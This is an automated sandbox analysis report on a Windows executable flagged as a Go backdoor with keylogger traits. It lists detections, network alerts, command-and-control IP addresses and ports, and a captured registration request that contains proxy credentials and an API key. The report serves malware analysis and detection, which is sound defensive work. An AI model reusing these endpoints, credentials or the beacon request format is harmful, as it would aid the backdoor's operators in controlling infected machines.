Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe
Analysis ID:1611944
MD5:2e82e1c508af8197f9a033822e9d742f
SHA1:810bb59a46ef0ab3e164f4d45b2334d0f5af9e04
SHA256:50a606e258eabb822fe0b64ce17d91fcc17b1f4465aa874c2f3f1ff51fb3a956
Tags:exeuser-SecuriteInfoCom
Infos:

Detection

GO Backdoor
Score:92
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GO Backdoor
Found Tor onion address
Joe Sandbox ML detected suspicious sample
Uses known network protocols on non-standard ports
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
One or more processes crash
PE file contains sections with non-standard names
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe (PID: 7712 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe" MD5: 2E82E1C508AF8197F9A033822E9D742F)
    • WerFault.exe (PID: 8044 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 756 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 8076 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 780 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 8112 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 796 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 8144 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 816 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2581726494.000000000C940000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GOBackdoorYara detected GO BackdoorJoe Security
    Process Memory Space: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe PID: 7712JoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      Process Memory Space: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe PID: 7712JoeSecurity_GOBackdoorYara detected GO BackdoorJoe Security

        Sigma Signatures

        No Sigma rule has matched

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-02-11T10:55:40.448676+010028554781A Network Trojan was detected192.168.2.114990346.8.232.10630001TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-02-11T10:55:41.001163+010028555361A Network Trojan was detected192.168.2.1149932185.121.233.15214887TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-02-11T10:56:10.449366+010028555371A Network Trojan was detected192.168.2.1149932185.121.233.15214887TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-02-11T10:56:10.628328+010028555381A Network Trojan was detected185.121.233.15214887192.168.2.1149932TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-02-11T10:55:41.000742+010028555391A Network Trojan was detected185.121.233.15214887192.168.2.1149932TCP

        Joe Sandbox Signatures

        • AV Detection
        • Compliance
        • Networking
        • Key, Mouse, Clipboard, Microphone and Screen Capturing
        • System Summary
        • Data Obfuscation
        • Hooking and other Techniques for Hiding and Protection
        • Malware Analysis System Evasion
        • Anti Debugging
        • Language, Device and Operating System Detection
        • Stealing of Sensitive Information
        • Remote Access Functionality

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: http://147.45.196.157:30001/api/helper-first-registerAvira URL Cloud: Label: malware
        Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeVirustotal: Detection: 26%Perma Link
        Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeReversingLabs: Detection: 34%
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

        Compliance

        barindex
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeUnpacked PE file: 0.2.SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe.6c0000.0.unpack
        Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
        Source: Binary string: wntdll.pdbUGP source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2576724895.00000000031A0000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2576724895.00000000031A0000.00000040.00001000.00020000.00000000.sdmp

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2855539 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2 : 185.121.233.152:14887 -> 192.168.2.11:49932
        Source: Network trafficSuricata IDS: 2855478 - Severity 1 - ETPRO MALWARE Golang Backdoor Activity - Observed GhostSOCKS related : 192.168.2.11:49903 -> 46.8.232.106:30001
        Source: Network trafficSuricata IDS: 2855536 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1 : 192.168.2.11:49932 -> 185.121.233.152:14887
        Source: Network trafficSuricata IDS: 2855537 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2 : 192.168.2.11:49932 -> 185.121.233.152:14887
        Source: Network trafficSuricata IDS: 2855538 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1 : 185.121.233.152:14887 -> 192.168.2.11:49932
        Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000003.1655200621.0000000003730000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''quit3125Atoiint8uintchanfunccallkind != ermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--AhomChamKawiLisuMiaoModiNewaThaiTotoDashasn1tag:MarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930false<nil>Errordefersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirLstatarray%s:%dyamuxlocalparsentohs1562578125int16int32int64uint8slicesse41sse42ssse3 (at ClassTypeAtls: Earlyutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermSHA-1P-224P-256P-384P-521ECDSAupdatekilleduserIdconfigSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13StringFormat[]bytestringsysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remotehangup Value390625uint16uint32uint64structchan<-<-chanrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerGetACPX25519%w%.0wAcceptServerArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenSTREETTuesdayJanuaryOctoberMUI_StdMUI_Dltfloat32float64forcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswindowswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefused\\.\UNCabortedCopySidWSARecvWSASendsignal Swapper19531259765625invaliduintptrChanDir Value>Convertos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectutf-8''charsetAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop tracedisablethpinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachet
        Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 30001
        Source: unknownNetwork traffic detected: HTTP traffic on port 30001 -> 49903
        Source: global trafficTCP traffic: 192.168.2.11:49903 -> 46.8.232.106:30001
        Source: global trafficTCP traffic: 192.168.2.11:49932 -> 185.121.233.152:14887
        Source: Joe Sandbox ViewIP Address: 46.8.232.106 46.8.232.106
        Source: Joe Sandbox ViewIP Address: 185.121.233.152 185.121.233.152
        Source: Joe Sandbox ViewASN Name: FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics
        Source: Joe Sandbox ViewASN Name: IPCORE-ASES IPCORE-ASES
        Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
        Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
        Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
        Source: unknownTCP traffic detected without corresponding DNS query: 185.121.233.152
        Source: unknownTCP traffic detected without corresponding DNS query: 185.121.233.152
        Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
        Source: unknownTCP traffic detected without corresponding DNS query: 185.121.233.152
        Source: unknownTCP traffic detected without corresponding DNS query: 185.121.233.152
        Source: unknownTCP traffic detected without corresponding DNS query: 185.121.233.152
        Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
        Source: unknownTCP traffic detected without corresponding DNS query: 185.121.233.152
        Source: unknownTCP traffic detected without corresponding DNS query: 185.121.233.152
        Source: unknownTCP traffic detected without corresponding DNS query: 185.121.233.152
        Source: unknownTCP traffic detected without corresponding DNS query: 185.121.233.152
        Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
        Source: unknownTCP traffic detected without corresponding DNS query: 185.121.233.152
        Source: unknownTCP traffic detected without corresponding DNS query: 185.121.233.152
        Source: unknownTCP traffic detected without corresponding DNS query: 185.121.233.152
        Source: unknownTCP traffic detected without corresponding DNS query: 185.121.233.152
        Source: unknownTCP traffic detected without corresponding DNS query: 185.121.233.152
        Source: global trafficHTTP traffic detected: GET /api/helper-first-register?buildVersion=0z76.pdO2CqG&md5=2e82e1c508af8197f9a033822e9d742f&proxyPassword=3ijnTpLW&proxyUsername=4dUZxibc&userId=gyQqwSb2enJmg2j1kyuweSXakKqafLse HTTP/1.1Host: 46.8.232.106:30001User-Agent: Go-http-client/1.1X-Api-Key: GAlbhK5HAccept-Encoding: gzip
        Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2581726494.000000000C92A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://147.45.196.157:30001/api/helper-first-register
        Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2580290752.000000000C864000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://147.45.196.157:30001/api/helper-first-register185.121.233.152;14887;hQUatmqOtRaIpGdc:Gtx/0zT/
        Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2581726494.000000000C92A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://147.45.196.157:30001/api/helper-first-register2025/02/11
        Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2580290752.000000000C85C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.232.106:30001
        Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2581726494.000000000C92A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.232.106:30001/api/helper-first-register
        Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2580290752.000000000C80E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.232.106:30001/api/helper-first-register?
        Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2580290752.000000000C80E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.232.106:30001/api/helper-first-register?abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUV
        Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2580290752.000000000C84E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.232.106:30001/api/helper-first-register?buildVersion=0z76.pdO2CqG&md5=2e82e1c508af8197f9
        Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2580290752.000000000C85C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.232.106:30001GAlbhK5HREQUEST_METHODGo-http-client/1.1
        Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2581726494.000000000C92A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.236.61:30001/api/helper-first-register
        Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2581726494.000000000C92A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://91.212.166.91:30001/api/helper-first-register
        Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2581726494.000000000C92A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://91.212.166.9:30001/api/helper-first-register
        Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2580290752.000000000C854000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://HTTP/1.1X-Api-KeyGAlbhK5Hhttp/1.1http/1.1HTTP_PROXY
        Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeString found in binary or memory: http://www.picget.net
        Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeString found in binary or memory: http://www.picget.net/photoshine-photo-editor/buy.html
        Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeString found in binary or memory: http://www.picget.net/photoshine-photo-editor/buy.htmlIEXPLORE.EXEopenU
        Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeString found in binary or memory: http://www.picget.netIEXPLORE.EXEopenU
        Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe PID: 7712, type: MEMORYSTR
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_03123A3A NtWriteVirtualMemory,NtWriteVirtualMemory,0_2_03123A3A
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_03123A22 NtWriteVirtualMemory,NtWriteVirtualMemory,0_2_03123A22
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_0313D2990_2_0313D299
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_031279700_2_03127970
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_0312F1E00_2_0312F1E0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_031316300_2_03131630
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_03130CC00_2_03130CC0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 756
        Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000000.1318745666.0000000000D05000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameProfessional Image Effect for DELPHI8 vs SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe
        Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2576724895.00000000032CD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe
        Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2581726494.000000000C932000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameProfessional Image Effect for DELPHI8 vs SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe
        Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeBinary or memory string: OriginalFilenameProfessional Image Effect for DELPHI8 vs SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe
        Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
        Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeStatic PE information: Section: ogmsrn ZLIB complexity 1.021484375
        Source: classification engineClassification label: mal92.troj.evad.winEXE@5/1@0/2
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeMutant created: \Sessions\1\BaseNamedObjects\RunOnlyOnce_MyProjectShine
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeFile created: C:\Users\user\AppData\Local\Temp\configJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeVirustotal: Detection: 26%
        Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeReversingLabs: Detection: 34%
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe"
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 756
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 780
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 796
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 816
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeSection loaded: dxgi.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeSection loaded: mswsock.dllJump to behavior
        Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeStatic file information: File size 6808576 > 1048576
        Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeStatic PE information: Raw size of CODE is bigger than: 0x100000 < 0x3d6e00
        Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x296000
        Source: Binary string: wntdll.pdbUGP source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2576724895.00000000031A0000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe, 00000000.00000002.2576724895.00000000031A0000.00000040.00001000.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeUnpacked PE file: 0.2.SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe.6c0000.0.unpack
        Source: SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeStatic PE information: section name: ogmsrn
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_03152B10 push dword ptr [esp]; retn 0004h0_2_03152B46
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_03152B1D push dword ptr [esp]; retn 0004h0_2_03152B46
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_0315171F push dword ptr [esp+2Ch]; retn 0030h0_2_03151704
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_03150305 push dword ptr [esp]; retn 0004h0_2_031502A2
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_0315170F push dword ptr [esp+30h]; retn 0034h0_2_031517F5
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_03151730 push dword ptr [esp+2Ch]; retn 0030h0_2_03151704
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_03151B3E push dword ptr [esp+08h]; retn 000Ch0_2_03151C28
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_03150326 push dword ptr [esp+0Ch]; retn 0010h0_2_03150389
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_03152B28 push dword ptr [esp]; retn 0004h0_2_03152B46
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_03151B57 push dword ptr [esp+18h]; retn 001Ch0_2_03151B65
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_03150353 push dword ptr [esp+0Ch]; retn 0010h0_2_03150389
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_0315175D push eax; ret 0_2_0315180F
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_03152B59 push dword ptr [esp]; retn 0004h0_2_03152B46
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_03151B43 push dword ptr [esp+08h]; retn 000Ch0_2_03151C28
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_03151B7A push dword ptr [esp+0Ch]; retn 0010h0_2_03151B9B
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_03150362 push dword ptr [esp+0Ch]; retn 0010h0_2_03150389
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_0315036F push dword ptr [esp+0Ch]; retn 0010h0_2_03150389
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_03150397 push eax; ret 0_2_031503A3
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_03151F96 push ebx; ret 0_2_03151F97
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_03152B9F push dword ptr [esp]; retn 0004h0_2_03152B46
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_03152B83 push dword ptr [esp]; retn 0004h0_2_03152B46
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_03151DBF push eax; mov dword ptr [esp], esi0_2_03151DD1
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_03151DBF push dword ptr [esp+14h]; retn 0018h0_2_03151E0E
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_03151BBE push dword ptr [esp+0Ch]; retn 0010h0_2_03151B9B
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_031521A5 push ebx; ret 0_2_031521A6
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_031501A1 push dword ptr [esp]; retn 0004h0_2_031502A2
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_031517D8 push dword ptr [esp+30h]; retn 0034h0_2_031517F5
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_031517C3 push ecx; ret 0_2_03151C4E
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_03151FF4 push dword ptr [esp+04h]; retn 0008h0_2_03151FF8
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_03151BF6 push dword ptr [esp+04h]; retn 0008h0_2_03151BF3
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeCode function: 0_2_031529F2 push dword ptr [esp+20h]; retn 0024h0_2_03152A04

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 30001
        Source: unknownNetwork traffic detected: HTTP traffic on port 30001 -> 49903
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
